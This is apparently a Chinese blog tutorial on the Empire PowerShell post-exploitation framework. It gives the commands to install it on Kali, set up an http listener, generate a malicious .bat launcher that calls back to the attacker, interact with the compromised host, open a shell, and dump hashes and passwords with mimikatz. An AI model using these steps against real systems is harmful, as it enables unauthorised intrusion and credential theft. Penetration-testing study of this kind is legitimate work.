Empire是一个专为Windows平台设计的渗透测试攻击框架,采用PowerShell脚本作为攻击载荷。它具备生成stager进行提权和维持权限的功能,并支持无需powershell.exe即可运行PowerShell代理,还提供了多个后期漏洞利用模块,类似于Metasploit(简称msf)。
⚽ 在Kali Linux中安装 在Kali Linux中安装Empire非常简单,只需执行以下命令即可:
sudo apt install powershell-empire
🎨 启动服务端 启动Empire PowerShell服务端与我们之前介绍过的CS类似,分为客户端和服务端。首先启动Empire PowerShell服务端:
powershell-empire server
🎳 启动Empire PowerShell客户端
powershell-empire client
📢 初试牛刀 Empire的使用方法与msf类似,首先设置监听,生成木马,然后监听反弹代理。输入Listeners
进入监听页面,使用uselistener
设置监听模式,共有7种模式:
- dbx
- http
- http_foreign
- http_hop
- http_mapi
- http_com
- meterpreter
这里,我们以http
模块为例:
uselistener http # 设置监听方式为http set Port 4321 # 设置端口 execute # 运行
现在配置完监听模块,我们来看看如何生成shell。使用windows/launcher_bat
模块生成恶意shell:
usestager windows/launcher_bat set Listener http # 设置监听方式 execute # 运行
执行完上述命令后,恶意文件已经生成。格式为bat。
双击运行后,我们可以看到已成功获取会话。输入agents
可以查看连接上的计算机的详细信息。
🧩 连接设备 与msf类似,我们需要连接当前在线的设备。使用interact
命令,加上设备名:
interact V1T86EUN
运行help
命令,可以查看具体的帮助文档。
由于命令较多,这里列举常用的一些命令:
- 进入系统cmd:
shell
- 使用内置的mimikatz抓取hash和密码:
mimikatz
- 设备详细信息:
info
可以看到,列出的信息还是比较全面的。
🎯 总结 Empire模块和msf一样,功能强大。虽然与msf相比配置略有不同,但后续文章中我们将重点更新!喜欢的小伙伴们欢迎点赞收藏!
暂无评论内容